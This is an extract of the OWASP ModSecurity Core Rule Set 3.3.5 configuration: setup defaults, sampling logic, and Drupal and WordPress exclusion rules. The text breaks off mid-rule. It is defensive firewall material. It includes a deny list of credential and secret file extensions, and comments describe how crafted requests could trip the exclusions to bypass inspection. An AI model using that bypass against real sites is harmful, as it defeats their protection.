tx.crs_setup_version variable before including # the CRS rules/* files. # # The variable is a numerical representation of the CRS version number. # E.g., v3.0.0 is represented as 300. # SecRule &TX:crs_setup_version "@eq 0" \ "id:901001,\ phase:1,\ deny,\ status:500,\ log,\ auditlog,\ msg:'ModSecurity Core Rule Set is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL'" # # -=[ Default setup values ]=- # # Some constructs or individual rules will fail if certain parameters # are not set in the setup.conf file. The following rules will catch # these cases and assign sane default values. # # Default Inbound Anomaly Threshold Level (rule 900110 in setup.conf) SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \ "id:901100,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.inbound_anomaly_score_threshold=5'" # Default Outbound Anomaly Threshold Level (rule 900110 in setup.conf) SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \ "id:901110,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.outbound_anomaly_score_threshold=4'" # Default Paranoia Level (rule 900000 in setup.conf) SecRule &TX:paranoia_level "@eq 0" \ "id:901120,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.paranoia_level=1'" # Default Executing Paranoia Level (rule 900000 in setup.conf) SecRule &TX:executing_paranoia_level "@eq 0" \ "id:901125,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.executing_paranoia_level=%{TX.PARANOIA_LEVEL}'" # Default Sampling Percentage (rule 900400 in setup.conf) SecRule &TX:sampling_percentage "@eq 0" \ "id:901130,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.sampling_percentage=100'" # Default Anomaly Scores (rule 900100 in setup.conf) SecRule &TX:critical_anomaly_score "@eq 0" \ "id:901140,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.critical_anomaly_score=5'" SecRule &TX:error_anomaly_score "@eq 0" \ "id:901141,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.error_anomaly_score=4'" SecRule &TX:warning_anomaly_score "@eq 0" \ "id:901142,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.warning_anomaly_score=3'" SecRule &TX:notice_anomaly_score "@eq 0" \ "id:901143,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.notice_anomaly_score=2'" # Default do_reput_block SecRule &TX:do_reput_block "@eq 0" \ "id:901150,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.do_reput_block=0'" # Default block duration SecRule &TX:reput_block_duration "@eq 0" \ "id:901152,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.reput_block_duration=300'" # Default HTTP policy: allowed_methods (rule 900200) SecRule &TX:allowed_methods "@eq 0" \ "id:901160,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" # Default HTTP policy: allowed_request_content_type (rule 900220) SecRule &TX:allowed_request_content_type "@eq 0" \ "id:901162,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'" # Default HTTP policy: allowed_request_content_type_charset (rule 900270) SecRule &TX:allowed_request_content_type_charset "@eq 0" \ "id:901168,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'" # Default HTTP policy: allowed_http_versions (rule 900230) SecRule &TX:allowed_http_versions "@eq 0" \ "id:901163,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'" # Default HTTP policy: restricted_extensions (rule 900240) SecRule &TX:restricted_extensions "@eq 0" \ "id:901164,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" # Default HTTP policy: restricted_headers (rule 900250) SecRule &TX:restricted_headers "@eq 0" \ "id:901165,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.restricted_headers=/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/'" # Default HTTP policy: static_extensions (rule 900260) SecRule &TX:static_extensions "@eq 0" \ "id:901166,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'" # Default enforcing of body processor URLENCODED SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \ "id:901167,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.enforce_bodyproc_urlencoded=0'" # Default check for UTF8 encoding validation SecRule &TX:crs_validate_utf8_encoding "@eq 0" \ "id:901169,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.crs_validate_utf8_encoding=0'" # Default monitor_anomaly_score value SecRule &TX:monitor_anomaly_score "@eq 0" \ "id:901170,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.monitor_anomaly_score=0'" # # -=[ Initialize internal variables ]=- # # Initialize anomaly scoring variables. # All _score variables start at 0, and are incremented by the various rules # upon detection of a possible attack. # sql_error_match is used for shortcutting rules for performance reasons. SecAction \ "id:901200,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.anomaly_score=0',\ setvar:'tx.anomaly_score_pl1=0',\ setvar:'tx.anomaly_score_pl2=0',\ setvar:'tx.anomaly_score_pl3=0',\ setvar:'tx.anomaly_score_pl4=0',\ setvar:'tx.sql_injection_score=0',\ setvar:'tx.xss_score=0',\ setvar:'tx.rfi_score=0',\ setvar:'tx.lfi_score=0',\ setvar:'tx.rce_score=0',\ setvar:'tx.php_injection_score=0',\ setvar:'tx.http_violation_score=0',\ setvar:'tx.session_fixation_score=0',\ setvar:'tx.inbound_anomaly_score=0',\ setvar:'tx.outbound_anomaly_score=0',\ setvar:'tx.outbound_anomaly_score_pl1=0',\ setvar:'tx.outbound_anomaly_score_pl2=0',\ setvar:'tx.outbound_anomaly_score_pl3=0',\ setvar:'tx.outbound_anomaly_score_pl4=0',\ setvar:'tx.sql_error_match=0'" # # -=[ Initialize collections ]=- # # Create both Global and IP collections for rules to use. # There are some CRS rules that assume that these two collections # have already been initiated. # SecRule REQUEST_HEADERS:User-Agent "@rx ^.*$" \ "id:901318,\ phase:1,\ pass,\ t:none,t:sha1,t:hexEncode,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.ua_hash=%{MATCHED_VAR}'" SecAction \ "id:901321,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ initcol:global=global,\ initcol:ip=%{remote_addr}_%{tx.ua_hash},\ setvar:'tx.real_ip=%{remote_addr}'" # # -=[ Initialize Correct Body Processing ]=- # # Force request body variable and optionally request body processor # # Force body variable SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ "id:901340,\ phase:1,\ pass,\ nolog,\ noauditlog,\ msg:'Enabling body inspection',\ ctl:forceRequestBodyVariable=On,\ ver:'OWASP_CRS/3.3.5'" # Force body processor URLENCODED SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ "id:901350,\ phase:1,\ pass,\ t:none,t:urlDecodeUni,\ nolog,\ noauditlog,\ msg:'Enabling forced body inspection for ASCII content',\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ "ctl:requestBodyProcessor=URLENCODED" # # -=[ Easing In / Sampling Percentage ]=- # # This is used to send only a limited percentage of requests into the Core # Rule Set. The selection is based on TX.sampling_percentage and a pseudo # random number calculated below. # # Use this to ease into a new Core Rules installation with an existing # productive service. # # See # https://www.netnea.com/cms/2016/04/26/easing-in-conditional-modsecurity-rule-execution-based-on-pseudo-random-numbers/ # # # Generate the pseudo random number # # ATTENTION: This is no cryptographically secure random number. It's just # a cheap way to get some random number suitable for sampling. # # We take the entropy contained in the UNIQUE_ID. We hash that variable and # take the first integer numbers out of it. Theoretically, it is possible # there are no integers in a sha1 hash. We make sure we get two # integer numbers by taking the last two digits from the DURATION counter # (in microseconds). # Finally, leading zeros are removed from the two-digit random number. # SecRule TX:sampling_percentage "@eq 100" \ "id:901400,\ phase:1,\ pass,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-SAMPLING" SecRule UNIQUE_ID "@rx ^." \ "id:901410,\ phase:1,\ pass,\ t:sha1,t:hexEncode,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'TX.sampling_rnd100=%{MATCHED_VAR}'" SecRule DURATION "@rx (..)$" \ "id:901420,\ phase:1,\ pass,\ capture,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'TX.sampling_rnd100=%{TX.sampling_rnd100}%{TX.1}'" SecRule TX:sampling_rnd100 "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \ "id:901430,\ phase:1,\ pass,\ capture,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'TX.sampling_rnd100=%{TX.1}%{TX.2}'" SecRule TX:sampling_rnd100 "@rx ^0([0-9])" \ "id:901440,\ phase:1,\ pass,\ capture,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'TX.sampling_rnd100=%{TX.1}'" # # Sampling decision # # If a request is allowed to pass without being checked by the CRS, there is no # entry in the audit log (for performance reasons), but an error log entry is # being written. If you want to disable the error log entry, then issue the # following directive somewhere after the inclusion of the CRS # (E.g., RESPONSE-999-EXCEPTIONS.conf). # # SecRuleUpdateActionById 901450 "nolog" # SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \ "id:901450,\ phase:1,\ pass,\ log,\ noauditlog,\ msg:'Sampling: Disable the rule engine based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\ ctl:ruleEngine=Off,\ ver:'OWASP_CRS/3.3.5'" SecMarker "END-SAMPLING" # # Configuration Plausibility Checks # # Make sure executing paranoia level is not lower than paranoia level SecRule TX:executing_paranoia_level "@lt %{tx.paranoia_level}" \ "id:901500,\ phase:1,\ deny,\ status:500,\ t:none,\ log,\ msg:'Executing paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\ ver:'OWASP_CRS/3.3.5'" modsecurity-crs-3.3.5/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf000066400000000000000000000324711446122515100241440ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # These exclusions remedy false positives in a default Drupal install. # The exclusions are only active if crs_exclusions_drupal=1 is set. # See rule 900130 in crs-setup.conf.example for instructions. # # [ POLICY ] # # Drupal is a complex application that is hard to secure with the CRS. This set # of exclusion rules aims to sanitise the CRS in a way that allows a default # Drupal setup to be installed and configured without much hassle as far as # ModSecurity and the CRS are concerned. # # The exclusion rules are fairly straight forward in the sense that they # disable CRS on a set of well-known parameter fields that are often the source # of false positives / false alarms of the CRS. This includes namely the # session cookie, the password fields and article/node bodies. # # This is based on two assumptions: - You have a basic trust in your # authenticated users who are allowed to edit nodes. - Drupal allows html # content in nodes and it protects your users from attacks via these fields. # # If you think these assumptions are wrong or if you would prefer a more # careful/secure approach, you can disable the exclusion rules handling of said # node body false positives. Do this by placing the following directive in # RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf. # # SecRuleRemoveById 9001200-9001299 # # This will mean the CRS remain intact for the editing of node bodies. # # The exclusion rules in this file work without the need to define a Drupal # installation path prefix. Instead they look at the URI from the end - or # they use regular expressions when targeting dynamic URL. This is all not # totally foolproof. In some cases, an advanced attacker might be able to # doctor a request in a way that one of these exclusion rules is triggered # and the request will bypass all further inspection despite not being a # Drupal request at all. These exclusion rules could thus be leveraged to # disable the CRS completely. This is why these rules are off by default. # # The CRS rules covered by this ruleset are the rules with Paranoia Level 1 and # 2. If you chose to run Paranoia Level 3 or 4, you will be facing additional # false positives which you need to handle yourself. # # This set of exclusion rules does not cover any additional Drupal modules # outside of core. # # The exclusion rules are based on Drupal 8.1.10. # # And finally: This set of exclusion rules is in an experimental state. If you # encounter false positives with the basic Drupal functionality and they are # not covered by this rule file, then please report them. The aim is to be able # to install and run Drupal core in a seamless manner protected by # ModSecurity / CRS up to the paranoia level 2. SecRule &TX:crs_exclusions_drupal|TX:crs_exclusions_drupal "@eq 0" \ "id:9001000,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-DRUPAL-RULE-EXCLUSIONS" SecRule &TX:crs_exclusions_drupal|TX:crs_exclusions_drupal "@eq 0" \ "id:9001001,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-DRUPAL-RULE-EXCLUSIONS" # [ Table of Contents ] # # 9001100 Session Cookie # 9001110 Password # 9001120 FREE for use # 9001130 FREE for use # 9001140 Content and Descriptions # 9001150 FREE for use # 9001160 Form Token # 9001170 Text Formats and Editors # 9001180 WYSIWYG/CKEditor Assets and Upload # 9001190 FREE for use # 9001200 Content and Descriptions # # The rule id range from 9001200 to 9001999 is reserved for future # use (Drupal plugins / modules). # [ Session Cookie ] # # Giving the session cookie a dynamic name is most unfortunate # from a ModSecurity perspective. The rule language does not allow # us to disable rules in a granular way for individual cookies with # dynamic names. So we need to disable rule causing false positives # for all cookies and their names. # # Rule Exclusion Session Cookie: 942450 SQL Hex Encoding Identified # SecAction "id:9001100,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES_NAMES,\ ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES,\ ver:'OWASP_CRS/3.3.5'" # # [ Password ] # # Disable the CRS completely for all occurrences of passwords. # SecRule REQUEST_FILENAME "@endsWith /core/install.php" \ "id:9001110,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass1],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass2],\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /user/login" \ "id:9001112,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass,\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /admin/people/create" \ "id:9001114,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@rx /user/[0-9]+/edit$" \ "id:9001116,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:current_pass,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\ ver:'OWASP_CRS/3.3.5'" # # [ Admin Settings (general) ] # # Disable known false positives for various fields used on admin pages. # # Rule Exclusion: 920271 Invalid character in request on multiple fields/paths # Rule Exclusion: 942430 Restricted SQL Character Anomaly Detection (args) # Disabled completely for admin/config pages # For the people/accounts page, we disable the CRS completely for a number of # freeform text fields. # SecRule REQUEST_FILENAME "@contains /admin/config/" \ "id:9001122,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveById=942430,\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /admin/config/people/accounts" \ "id:9001124,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveById=920271,\ ctl:ruleRemoveById=942440,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_cancel_confirm_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_password_reset_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_admin_created_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_no_approval_required_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_pending_approval_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_activated_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_blocked_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_canceled_body,\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /admin/config/development/configuration/single/import" \ "id:9001126,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveById=920271,\ ctl:ruleRemoveById=942440,\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ "id:9001128,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveById=942440,\ ver:'OWASP_CRS/3.3.5'" # # # [ Content and Descriptions ] # # Disable known false positives for field "ids[]". # # Rule Exclusion: 942130 SQL Injection Attack: SQL Tautology Detected # SecRule REQUEST_FILENAME "@endsWith /contextual/render" \ "id:9001140,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetById=942130;ARGS:ids[],\ ver:'OWASP_CRS/3.3.5'" # # [ Form Token / Build ID ] # # Rule Exclusion for form_build_id: 942440 SQL Comment Sequence Detected on ... # Rule Exclusion for form_token: 942450 SQL Hex Encoding # Rule Exclusion for form_build_id: 942450 SQL Hex Encoding # # This is applied site-wide. # SecAction "id:9001160,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetById=942440;ARGS:form_build_id,\ ctl:ruleRemoveTargetById=942450;ARGS:form_token,\ ctl:ruleRemoveTargetById=942450;ARGS:form_build_id,\ ver:'OWASP_CRS/3.3.5'" # # [ Text Formats and Editors ] # # Disable the CRS completely for two fields triggering many, many rules # # Rule Exclusion for two fields: 942440 SQL Comment Sequence Detected # SecRule REQUEST_FILENAME "@endsWith /admin/config/content/formats/manage/full_html" \ "id:9001170,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:editor[settings][toolbar][button_groups],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:filters[filter_html][settings][allowed_html],\ ver:'OWASP_CRS/3.3.5'" # # [ WYSIWYG/CKEditor Assets and Upload ] # # Disable the unnecessary requestBodyAccess and for binary uploads # bigger than an arbitrary limit of 31486341 bytes. # # Extensive checks make sure these uploads are really legitimate. # # Rule 9001180 was commented out in 2021 in order to fight CVE-2021-35368. # #SecRule REQUEST_METHOD "@streq POST" \ # "id:9001180,\ # phase:1,\ # pass,\ # t:none,\ # nolog,\ # noauditlog,\ # ver:'OWASP_CRS/3.3.0',\ # chain" # SecRule REQUEST_FILENAME "@rx /admin/content/assets/add/[a-z]+$" \ # "chain" # SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \ # "ctl:requestBodyAccess=Off" # Rule 9001182 was commented out in 2021 in order to fight CVE-2021-35368. # #SecRule REQUEST_METHOD "@streq POST" \ # "id:9001182,\ # phase:1,\ # pass,\ # t:none,\ # nolog,\ # noauditlog,\ # ver:'OWASP_CRS/3.3.0',\ # chain" # SecRule REQUEST_FILENAME "@rx /admin/content/assets/manage/[0-9]+$" \ # "chain" # SecRule ARGS:destination "@streq admin/content/assets" \ # "chain" # SecRule REQUEST_HEADERS:Content-Length "@gt 31486341" \ # "chain" # SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \ # "ctl:requestBodyAccess=Off" # Rule 9001184 was commented out in 2021 in order to fight CVE-2021-35368. # #SecRule REQUEST_METHOD "@streq POST" \ # "id:9001184,\ # phase:1,\ # pass,\ # t:none,\ # nolog,\ # noauditlog,\ # ver:'OWASP_CRS/3.3.0',\ # chain" # SecRule REQUEST_FILENAME "@rx /file/ajax/field_asset_[a-z0-9_]+/[ua]nd/0/form-[a-z0-9A-Z_-]+$" \ # "chain" # SecRule REQUEST_HEADERS:Content-Length "@gt 31486341" \ # "chain" # SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)multipart/form-data" \ # "chain" # SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \ # "ctl:requestBodyAccess=Off" # # [ Content and Descriptions ] # # Disable the CRS completely for node bodies and other free text fields. # Other rules are disabled individually. # # Rule Exclusion for ARGS:uid[0][target_id]: 942410 SQL Injection Attack # Rule Exclusion for ARGS:destination: 932110 RCE: Windows Command Inj. # SecRule REQUEST_FILENAME "@endsWith /node/add/article" \ "id:9001200,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /node/add/page" \ "id:9001202,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@rx /node/[0-9]+/edit$" \ "id:9001204,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ ctl:ruleRemoveTargetById=932110;ARGS:destination,\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /block/add" \ "id:9001206,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /admin/structure/block/block-content/manage/basic" \ "id:9001208,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:description,\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@rx /editor/filter_xss/(?:full|basic)_html$" \ "id:9001210,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:value,\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@rx /user/[0-9]+/contact$" \ "id:9001212,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message[0][value],\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ "id:9001214,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:maintenance_mode_message,\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /admin/config/services/rss-publishing" \ "id:9001216,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:feed_description,\ ver:'OWASP_CRS/3.3.5'" SecMarker "END-DRUPAL-RULE-EXCLUSIONS" modsecurity-crs-3.3.5/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf000066400000000000000000000624321446122515100245460ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # These exclusions remedy false positives in a default WordPress install. # The exclusions are only active if crs_exclusions_wordpress=1 is set. # See rule 900130 in crs-setup.conf.example for instructions. # # Note that the WordPress comment field itself is currently NOT excluded # from checking. The reason is that malicious content is regularly being # posted to WordPress comment forms, and there have been various cases # of XSS and even RCE vulnerabilities exploited by WordPress comments. SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \ "id:9002000,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-WORDPRESS" SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \ "id:9002001,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-WORDPRESS" # # -=[ WordPress Front-End ]=- # # # [ Login form ] # # User login password SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ "id:9002100,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd,\ ver:'OWASP_CRS/3.3.5'" # Reset password SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ "id:9002120,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq resetpass" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" # # [ Comments ] # # Post comment SecRule REQUEST_FILENAME "@endsWith /wp-comments-post.php" \ "id:9002130,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=931130;ARGS:url,\ ver:'OWASP_CRS/3.3.5'" # # [ Gutenberg Editor ] # Used when a user (auto)saves a post/page with Gutenberg. # # Gutenberg SecRule REQUEST_FILENAME "@rx /wp-json/wp/v[0-9]+/(?:posts|pages)" \ "id:9002140,\ phase:1,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:json.content,\ ver:'OWASP_CRS/3.3.5'" # Gutenberg via rest_route for sites without pretty permalinks SecRule REQUEST_FILENAME "@endsWith /index.php" \ "id:9002141,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule &ARGS:rest_route "@eq 1" \ "t:none,\ nolog,\ chain" SecRule ARGS:rest_route "@rx ^/wp/v[0-9]+/(?:posts|pages)" \ "t:none,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:json.content" # Gutenberg upload image/media SecRule REQUEST_FILENAME "@rx /wp-json/wp/v[0-9]+/media" \ "id:9002142,\ phase:1,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveById=200002,\ ctl:ruleRemoveById=200003,\ ver:'OWASP_CRS/3.3.5'" # Gutenberg upload image/media via rest_route for sites without pretty permalinks SecRule REQUEST_FILENAME "@endsWith /index.php" \ "id:9002143,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule &ARGS:rest_route "@eq 1" \ "t:none,\ nolog,\ chain" SecRule ARGS:rest_route "@rx ^/wp/v[0-9]+/media" \ "t:none,\ ctl:ruleRemoveById=200002,\ ctl:ruleRemoveById=200003" # # [ Live preview ] # Used when an administrator customizes the site and previews the result # as a normal user. # # Theme select # Example: wp_customize=on&theme=twentyfifteen&customized= # {"old_sidebars_widgets_data":{"wp_inactive_widgets":[], # "sidebar-1":["search-2","recent-posts-2","recent-comments-2", # "archives-2","categories-2","meta-2"]}}&nonce=XXX& # customize_messenger_channel=preview-0 SecRule ARGS:wp_customize "@streq on" \ "id:9002150,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule &ARGS:action "@eq 0" \ "t:none,\ ctl:ruleRemoveTargetById=942200;ARGS:customized,\ ctl:ruleRemoveTargetById=942260;ARGS:customized,\ ctl:ruleRemoveTargetById=942300;ARGS:customized,\ 